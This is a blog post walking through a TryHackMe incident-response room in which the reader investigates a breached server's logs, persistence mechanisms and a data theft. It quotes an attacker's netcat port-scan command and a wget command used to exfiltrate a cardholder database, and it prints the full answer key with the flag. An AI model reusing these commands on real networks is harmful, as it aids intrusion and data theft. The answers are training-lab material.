DEV Community

Cover image for TryHackMe API Wizard Breach Walkthrough
haXarubiX
haXarubiX

Posted on

TryHackMe API Wizard Breach Walkthrough

Task 1: Preparation

Step 1.1 SSH into the Machine

SSH into the box with the credentials provided.

ssh <username>@<IP_address>
# Replace <username> and <IP_address> with the values given

Enter fullscreen mode Exit fullscreen mode

Task 2: Initial Access

Question 1: Which programming language is the web application written in?

Navigate through the directories to find the application’s code.

cd /home/support/api_service
ls -la

Enter fullscreen mode Exit fullscreen mode

Answer: Python

Question 2: What is the IP address that attacked the web server?

The web server uses NGINX, so we can check its logs for suspicious activity.

cd /var/log/nginx
tail -n 10 access.log.1

Enter fullscreen mode Exit fullscreen mode

Look for commands like whoami, pwd, or id, which indicate enumeration attempts by an attacker.

Answer: 149.34.244.142

Question 3: Which vulnerability was found and exploited in the API service?

Inspect the api.py source code for vulnerabilities, particularly around command handling.

cat /home/support/api_service/api.py

Enter fullscreen mode Exit fullscreen mode

Answer: OS command injection

Question 4: Which file contained the credentials used to privilege escalate to root?

Examine the configuration file for any stored credentials.

cat /home/dev/apiservice/src/config.py

Enter fullscreen mode Exit fullscreen mode

Answer: /home/dev/apiservice/src/config.py

Question 5: What file did the hacker drop and execute to persist on the server?

Check the bash history to uncover any evidence of files dropped.

sudo su
cat /root/.bash_history

Enter fullscreen mode Exit fullscreen mode

Answer: /tmp/rooter2

Question 6: Which service was used to host the “rooter2” malware?

In .bash_history, look for commands involving file uploads or downloads.

Answer: transfer.sh


Task 3: Further Actions

Question 7: Which two system files were infected to achieve cron persistence?

Check crontab and environment files for unauthorized entries.

cat /etc/crontab
cat /etc/environment

Enter fullscreen mode Exit fullscreen mode

Answer: /etc/crontab, /etc/environment

Question 8: What is the C2 server IP address of the malicious actor?

Locate the IP address associated with the SYSTEMUPDATE variable in /etc/environment or other files identified in bash history.

Answer: 5.230.66.147

Question 9: What port is the backdoored bind bash shell listening on?

Use ps to check running processes for a netcat listener.

ps -aux | grep nc

Enter fullscreen mode Exit fullscreen mode

Answer: 3578

Question 10: How does the bind shell persist across reboots?

Locate the systemd service created by the attacker.

grep -R "nc -l" /

Enter fullscreen mode Exit fullscreen mode

Answer: systemd service

Question 11: What is the absolute path of the malicious service?

Find the absolute path from the output of the grep command above.

Answer: /etc/systemd/system/socket.service


Task 4: Even More Persistence

Question 12: Which port is blocked on the victim’s firewall?

Use iptables to examine the firewall configuration.

iptables -L

Enter fullscreen mode Exit fullscreen mode

Answer: 3578

Question 13: How do the firewall rules persist across reboots?

Check the root user's bash configuration files for persistence mechanisms.

cat /root/.bashrc

Enter fullscreen mode Exit fullscreen mode

Answer: /root/.bashrc

Question 14: How is the backdoored local Linux user named?

Inspect the /etc/passwd file for unusual user entries.

grep "/bin/bash" /etc/passwd

Enter fullscreen mode Exit fullscreen mode

Answer: support

Question 15: Which privileged group was assigned to the user?

Use the groups command to list group memberships for the user.

groups support

Enter fullscreen mode Exit fullscreen mode

Answer: sudo

Question 16: What is the strange word on one of the backdoored SSH keys?

View the authorized_keys file in the root user’s SSH directory.

cat /root/.ssh/authorized_keys

Enter fullscreen mode Exit fullscreen mode

Answer: ntsvc

Question 17: Can you spot and name one more popular persistence method? Not a MITRE technique name.

Check for files with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Enter fullscreen mode Exit fullscreen mode

Answer: SUID binary

Question 18: What are the original and the backdoored binaries from question 6?

Verify the integrity of the suspected binary.

ls -l /usr/bin/clamav
dpkg --verify clamav

Enter fullscreen mode Exit fullscreen mode

Answer: /usr/bin/bash, /usr/bin/clamav

Question 19: What technique was used to hide the backdoor creation date?

Identify timestamp modification.

Answer: Timestomping


Task 5: Final Target

Question 20: What file was dropped which contained gathered victim information?

Check root’s .bash_history for evidence of dropped files.

cat /root/.bash_history

Enter fullscreen mode Exit fullscreen mode

Answer: /root/.dump.json

Question 21: According to the dropped dump, what is the server’s kernel version?

Decode and inspect .dump.json for details.

cat /root/.dump.json | base64 -d

Enter fullscreen mode Exit fullscreen mode

Answer: 5.15.0–78-generic

Question 22: Which active internal IPs were found by the “rooter2” network scan?

Identify internal IPs from the dump.

Answer: 192.168.0.21,192.168.0.22

Question 23: How did the hacker find an exposed HTTP index on another internal IP?

Check the history for a network scan command.

grep -i "nc -zv" /root/.bash_history

Enter fullscreen mode Exit fullscreen mode

Answer: nc -zv 192.168.0.22 1024-10000 2>&1 | grep -v failed

Question 24: What command was used to exfiltrate the CDE database from the internal IP?

Locate the wget command in the history.

grep "wget" /root/.bash_history

Enter fullscreen mode Exit fullscreen mode

Answer: wget 192.168.0.22:8080/cde-backup.csv

Question 25: What is the most secret and precious string stored in the exfiltrated database?

Inspect the contents of the exfiltrated .review.csv file.

cat .review.csv | head -n 10

Enter fullscreen mode Exit fullscreen mode

Answer: pwned{v3ry-secur3-cardh0ld3r-data-environm3nt}

Another skill acquired, another challenge conquered in the Rubixverse. Keep hacking the limits... until the next hack.

Sentry image

Hands-on debugging session: instrument, monitor, and fix

Join Lazar for a hands-on session where you’ll build it, break it, debug it, and fix it. You’ll set up Sentry, track errors, use Session Replay and Tracing, and leverage some good ol’ AI to find and fix issues fast.

RSVP here →

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay